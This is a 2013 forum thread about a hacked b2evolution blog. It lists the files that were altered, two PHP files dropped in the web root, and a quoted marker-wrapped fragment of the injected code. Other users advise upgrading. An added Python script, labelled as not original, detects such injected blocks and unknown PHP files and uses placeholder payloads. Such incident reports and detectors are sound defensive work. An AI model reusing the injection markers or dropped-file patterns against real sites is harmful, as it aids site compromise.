
1 Aug 28, 2013 09:35    

In all likelihood I was hacked because I haven't upgraded from an early 4x and 3.3.2 (former on one site, latter on two other sites) all residing on the one host. (Yes well I didn't like 4x version so I wanted to stay with the earlier ones... sigh...) However, because I don't know much about hacks and what to look for in terms of problem areas, I'm posting this info to see if anyone has any more info/ideas/suggestions of what went wrong.

And yes, I am checking the usual stuff, but at the moment it doesn't look like my computer has a virus or anything like that. All my config files are set to 444 permissions, with the rest being at 644, and 755 for the media folder. No sign of help from my web host which suggests it's not a server issue.

Files hacked:
default.php
/cron/index.html
/htsrv/index.html
/htsrv/login.php
/inc/index.html
/locales/index.html
/media/index.html
/media/users/index.html
/media/users/admin/pics
/media/blogs/index.html
/rsc/index.html
all files in rsc/js
/skins/index.html
/skins/_410_stats_gone.main.php
/skins/_404_blog_not_found.main.php
/skins/_403_referer_spam.main.php
/skins/skin name/index.main.php, and some other files like single.main, etc
/skins_adm/conferror
/skins_adm/index.html
/skins_adm/access denied
/skins_adm/login
/xmlsrv/index.html
Some other non-b2evo html files in root that I used for placeholders and/or old info

And files added in root:
FtLy234n.php
zwxvr4Dh.php

This is the copy of what was added; some were JavaScript and some were placed in the PHP files.

#4f57d2#
if(empty($not)) {
echo $not;
}

#/4f57d2#



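A way to check a web root for this kind of injection, as an added example that is not part of the original posts: it finds blocks wrapped in a matching marker pair (the `#4f57d2#` and `#/4f57d2#` form posted above, and the same id inside HTML comments) and lists PHP files in the root that a clean release does not ship. The `/*id*/` style, the function names and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Marker styles: '#id#' and '<!--id-->' come from the post; '/*id*/' is an
# assumed variant for .js files. The closing marker repeats the id after '/'.
STYLES = [("#", "#"), ("<!--", "-->"), ("/*", "*/")]
MARKER_RE = re.compile("|".join(
    rf"{re.escape(o)}(?P<id{i}>[0-9a-f]{{6}}){re.escape(c)}"
    rf".*?{re.escape(o)}/(?P=id{i}){re.escape(c)}"
    for i, (o, c) in enumerate(STYLES)), re.DOTALL)
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}

def find_injections(text):
    """Return (marker_id, start, end) for each marker-wrapped block."""
    return [(m.group(m.lastgroup), m.start(), m.end())
            for m in MARKER_RE.finditer(text)]

def scan_tree(root):
    """Map each affected file (path relative to root) to its marker ids."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            ids = sorted({mid for mid, _, _ in find_injections(text)})
            if ids:
                hits[path.relative_to(root).as_posix()] = ids
    return hits

def unknown_root_php(root, known_good):
    """PHP files directly in root that a clean release does not ship."""
    return sorted(p.name for p in Path(root).glob("*.php")
                  if p.name not in known_good)

def build_sample(root):
    """Constructed sample tree; payload bodies are inert placeholders."""
    root = Path(root)
    (root / "skins").mkdir()
    (root / "default.php").write_text(
        "<?php\n#4f57d2#\necho 'PLACEHOLDER';\n#/4f57d2#\n?>\n<p>site</p>\n")
    (root / "skins" / "index.html").write_text(
        "<html><!--4f57d2-->PLACEHOLDER<!--/4f57d2--></html>\n")
    (root / "index.php").write_text("<?php echo 'clean #ffffff colour'; ?>\n")
    (root / "dropped.php").write_text("<?php /* unknown file */ ?>\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(scan_tree(tmp), unknown_root_php(tmp, {"index.php", "default.php"}))
```

Files it reports are candidates for comparison against a clean copy of the same release; the `known_good` set would come from that release's file list.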
2 Aug 28, 2013 17:45

Same has happened to me a number of times in the last couple of weeks. I was running 4.1.7.

Updated to latest v5 now.

3 Aug 29, 2013 06:54

What host are you with? I've found mine has been undergoing lots of hacking in the past few days - West Host.

5 Sep 03, 2013 06:43

Hmm, so not part of the same hackfest. Well, I think upgrading probably did the trick... serves me right for not doing it sooner I guess. Good luck with your site, hope they don't return for you either!

